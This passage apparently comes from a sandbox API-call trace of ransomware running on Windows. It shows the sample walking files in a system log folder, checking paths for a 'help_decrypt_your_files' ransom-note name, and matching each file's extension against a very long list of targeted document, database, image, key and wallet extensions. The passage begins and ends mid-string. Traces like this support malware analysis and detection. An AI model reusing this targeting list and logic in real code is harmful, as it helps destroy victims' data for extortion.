syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.186] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x3a5fe900, ftLastAccessTime.dwHighDateTime=0x1d7b059, ftLastWriteTime.dwLowDateTime=0x6178db96, ftLastWriteTime.dwHighDateTime=0x1d7b059, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.007.etl", cAlternateFileName="UP52FC~1.ETL")) returned 1
	[0179.187] lstrcmpW (lpString1="UpdateSessionOrchestration.007.etl", lpString2="..") returned 1
	[0179.187] lstrcmpW (lpString1="UpdateSessionOrchestration.007.etl", lpString2=".") returned 1
	[0179.187] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.187] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.007.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl"
	[0179.187] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl") returned 68
	[0179.187] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.187] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl") returned 0x44
	[0179.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.188] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.188] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl"
	[0179.195] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl") returned 68
	[0179.195] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.195] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.196] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.196] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf801cbae, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0x1f56df07, ftLastWriteTime.dwHighDateTime=0x1d75218, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.008.etl", cAlternateFileName="UPA721~1.ETL")) returned 1
	[0179.196] lstrcmpW (lpString1="UpdateSessionOrchestration.008.etl", lpString2="..") returned 1
	[0179.196] lstrcmpW (lpString1="UpdateSessionOrchestration.008.etl", lpString2=".") returned 1
	[0179.196] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.196] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.008.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl"
	[0179.197] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl") returned 68
	[0179.197] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.197] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl") returned 0x44
	[0179.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.197] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.197] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl"
	[0179.197] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl") returned 68
	[0179.197] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.198] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.198] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cd